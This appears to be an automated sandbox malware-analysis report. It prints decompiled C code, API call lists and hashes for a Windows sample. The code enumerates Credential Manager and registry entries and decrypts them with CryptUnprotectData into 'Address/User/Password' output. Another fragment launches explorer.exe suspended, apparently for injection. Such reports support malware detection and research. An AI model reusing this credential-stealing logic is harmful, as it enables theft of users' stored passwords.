                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408E58, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 328registryencryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				void* _v24;
				int _v28;
				int _v32;
				int _v36;
				char* _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				long _t168;
				long _t238;
				long _t251;
				char* _t259;
				signed int _t260;
				intOrPtr _t262;
				intOrPtr _t323;
				intOrPtr _t326;
				intOrPtr _t327;
				long _t339;
				long _t340;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t350;

				_t350 = __fp0;
				_t341 = __esi;
				_t343 = _t344;
				_t262 = 0xd;
				do {
					_push(0);
					_push(0);
					_t262 = _t262 - 1;
				} while (_t262 != 0);
				_t1 =  &_v8;
				 *_t1 = _t262;
				_push(__esi);
				_v12 =  *_t1;
				_t259 = __edx;
				_v8 = __eax;
				E0040302C(_v8);
				_push(_t343);
				_push(0x4092a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t344;
				E00401AC0( &_v80);
				_v16 = 0;
				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
					_v28 = 0x400;
					_t341 = E00401174(_v28);
					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
						_v28 = 0x400;
						_t339 = E00402E08();
						__eflags = _t339;
						if(_t339 >= 0) {
							_t340 = _t339 + 1;
							_t260 = 0;
							__eflags = 0;
							do {
								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
								_push(_v36);
								E00402FBC();
								_t344 = _t344 + 4;
								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
								__eflags = _t238;
								if(_t238 == 0) {
									_v44 = _v40;
									_v48 = _v36;
									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
									_push( &_v56);
									_push(1);
									_push(0);
									_push(0);
									_push( &_v64);
									_push(0);
									_t251 =  &_v48;
									_push(_t251);
									L004086F0();
									__eflags = _t251;
									if(_t251 != 0) {
										_push(_v80);
										_push("Address: ");
										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
										_push(_v88);
										_push(0x4092d4);
										E00401E10();
										_push(_v80);
										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
										_push(_v92);
										_push(0x4092e0);
										E00401E10();
									}
								}
								_t260 = _t260 + 1;
								_t340 = _t340 - 1;
								__eflags = _t340;
							} while (_t340 != 0);
						}
						E00403738();
						_t57 =  &_v16;
						 *_t57 = _v16 + 1;
						__eflags =  *_t57;
					}
				}
				RegCloseKey(_v24);
				L17:
				while(E0040202C(0x4092e0, _v80) > 0) {
					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
					E00401D9C( &_v100, 0x4092e0, _v72);
					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
					E00401B58( &_v80, _v96);
					__eflags = E0040202C(0x4092ec, _v72) - 1;
					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
					E00401E94(_v104, "Address");
					if(__eflags == 0) {
						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
						while(1) {
							_t168 = E0040202C(0x4092d4, _v72);
							__eflags = _t168;
							if(_t168 <= 0) {
								goto L17;
							}
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							_push(_v68);
							_push(0x4092d4);
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
							_push(_v108);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							__eflags = E0040202C(0x4092d4, _v72) - 1;
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
							_push(_v112);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401D58( &_v76, 0x4092e0);
						}
					}
				}
				E00401B14(_v12, _v76);
				_pop(_t323);
				 *[fs:eax] = _t323;
				_push(E004092AE);
				E00401AE4( &_v112, 7);
				E00402108( &_v84);
				E00401AE4( &_v80, 4);
				_t326 =  *0x408e34; // 0x408e38
				E00402FC8( &_v40, _t326);
				E00401AC0( &_v20);
				_t327 =  *0x408730; // 0x408734
				return E00402FC8( &_v8, _t327);
			}












































                                    0x00408e58
                                    0x00408e58
                                    0x00408e59
                                    0x00408e5c
                                    0x00408e61
                                    0x00408e61
                                    0x00408e63
                                    0x00408e65
                                    0x00408e65
                                    0x00408e68
                                    0x00408e68
                                    0x00408e6c
                                    0x00408e6e
                                    0x00408e71
                                    0x00408e73
                                    0x00408e79
                                    0x00408e80
                                    0x00408e81
                                    0x00408e86
                                    0x00408e89
                                    0x00408e8f
                                    0x00408e96
                                    0x00408eae
                                    0x00408eb4
                                    0x00408ec3
                                    0x00408ff8
                                    0x00408eca
                                    0x00408ed9
                                    0x00408edb
                                    0x00408edd
                                    0x00408ee3
                                    0x00408ee4
                                    0x00408ee4
                                    0x00408ee6
                                    0x00408eef
                                    0x00408f05
                                    0x00408f0d
                                    0x00408f1c
                                    0x00408f21
                                    0x00408f37
                                    0x00408f3c
                                    0x00408f3e
                                    0x00408f47
                                    0x00408f4d
                                    0x00408f56
                                    0x00408f62
                                    0x00408f72
                                    0x00408f78
                                    0x00408f79
                                    0x00408f7b
                                    0x00408f7d
                                    0x00408f82
                                    0x00408f83
                                    0x00408f85
                                    0x00408f88
                                    0x00408f89
                                    0x00408f8e
                                    0x00408f90
                                    0x00408f92
                                    0x00408f95
                                    0x00408fa3
                                    0x00408fa8
                                    0x00408fab
                                    0x00408fb8
                                    0x00408fbd
                                    0x00408fc9
                                    0x00408fce
                                    0x00408fd1
                                    0x00408fde
                                    0x00408fde
                                    0x00408f90
                                    0x00408fe3
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408ee6
                                    0x00408ff0
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff8
                                    0x00409021
                                    0x00000000
                                    0x00409233
                                    0x00409047
                                    0x00409064
                                    0x00409078
                                    0x00409085
                                    0x00409090
                                    0x004090a8
                                    0x004090b1
                                    0x004090be
                                    0x004090c3
                                    0x004090e0
                                    0x00409101
                                    0x0040911d
                                    0x0040921e
                                    0x00409226
                                    0x0040922b
                                    0x0040922d
                                    0x00000000
                                    0x00000000
                                    0x0040913e
                                    0x00409143
                                    0x00409146
                                    0x00409149
                                    0x0040916a
                                    0x0040916f
                                    0x00409172
                                    0x0040917f
                                    0x0040919b
                                    0x004091b7
                                    0x004091bc
                                    0x004091d2
                                    0x004091db
                                    0x004091e0
                                    0x004091e3
                                    0x004091f0
                                    0x0040920c
                                    0x00409219
                                    0x00409219
                                    0x0040921e
                                    0x004090c3
                                    0x0040924e
                                    0x00409255
                                    0x00409258
                                    0x0040925b
                                    0x00409268
                                    0x00409270
                                    0x0040927d
                                    0x00409285
                                    0x0040928b
                                    0x00409293
                                    0x0040929b
                                    0x004092a6

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930B, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				intOrPtr _v117;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t81;
				void* _t86;
				intOrPtr _t121;
				void* _t160;
				void* _t175;
				void* _t187;
				void* _t189;
				short* _t191;
				intOrPtr _t198;
				intOrPtr _t203;
				void* _t226;
				void* _t233;
				signed int _t234;
				void* _t236;
				intOrPtr* _t238;
				intOrPtr _t240;
				intOrPtr _t241;

				_t174 = __ebx;
				_v117 = _v117 + __edx;
				_t240 = _t241;
				_t175 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t175 = _t175 - 1;
				} while (_t175 != 0);
				_push(_t175);
				_push(__ebx);
				_t236 = __eax;
				_push(_t240);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t241;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t238 = _t236;
				_t233 = 0x25;
				_t81 =  &_v151;
				_t191 =  &_v114;
				do {
					 *_t191 = 0 << 2;
					_t191 = _t191 + 2;
					_t81 = _t81 + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t86 = _v12 - 1;
				if(_t86 >= 0) {
					_v40 = _t86 + 1;
					_t234 = 0;
					do {
						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
						_v20 =  *((intOrPtr*)(_t121 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t238);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t174 = _v24;
						E00401D9C( &_v168, "User: ",  *_t238);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t187);
						E0040234C(_v180, _t187, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t238, _v160);
						E00401D9C( &_v192, "Password: ",  *_t238);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t160 = E00402274(_v204);
						_push(_t160 - _t222);
						E00402218( &_v208, _t174);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t174);
						_pop(_t226);
						_pop(_t189);
						E0040234C(_v212, _t189, _t226, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t238, _v184);
						_t234 = _t234 + 1;
						_t60 =  &_v40;
						 *_t60 = _v40 - 1;
						_t249 =  *_t60;
					} while ( *_t60 != 0);
				}
				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
				E00401B14(_t238, _v216);
				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
				E00401B14(_t238, _v220);
				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
				E00401B14(_t238, _v224);
				_pop(_t198);
				 *[fs:eax] = _t198;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t203 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t203);
			}


















































                                    0x0040930b
                                    0x0040930b
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930C, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t79;
				void* _t84;
				intOrPtr _t119;
				void* _t158;
				void* _t173;
				void* _t185;
				void* _t187;
				short* _t188;
				intOrPtr _t195;
				intOrPtr _t200;
				void* _t223;
				void* _t230;
				signed int _t231;
				void* _t233;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr _t238;

				_t172 = __ebx;
				_t237 = _t238;
				_t173 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t173 = _t173 - 1;
				} while (_t173 != 0);
				_push(_t173);
				_push(__ebx);
				_t233 = __eax;
				_push(_t237);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t238;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t235 = _t233;
				_t230 = 0x25;
				_t79 =  &_v151;
				_t188 =  &_v114;
				do {
					 *_t188 = 0 << 2;
					_t188 = _t188 + 2;
					_t79 = _t79 + 1;
					_t230 = _t230 - 1;
				} while (_t230 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t84 = _v12 - 1;
				if(_t84 >= 0) {
					_v40 = _t84 + 1;
					_t231 = 0;
					do {
						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
						_v20 =  *((intOrPtr*)(_t119 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t235);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t172 = _v24;
						E00401D9C( &_v168, "User: ",  *_t235);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t185);
						E0040234C(_v180, _t185, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t235, _v160);
						E00401D9C( &_v192, "Password: ",  *_t235);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t158 = E00402274(_v204);
						_push(_t158 - _t219);
						E00402218( &_v208, _t172);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t172);
						_pop(_t223);
						_pop(_t187);
						E0040234C(_v212, _t187, _t223, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t235, _v184);
						_t231 = _t231 + 1;
						_t58 =  &_v40;
						 *_t58 = _v40 - 1;
						_t245 =  *_t58;
					} while ( *_t58 != 0);
				}
				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
				E00401B14(_t235, _v216);
				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
				E00401B14(_t235, _v220);
				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
				E00401B14(_t235, _v224);
				_pop(_t195);
				 *[fs:eax] = _t195;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t200 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t200);
			}

















































                                    0x0040930c
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AD5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 57%
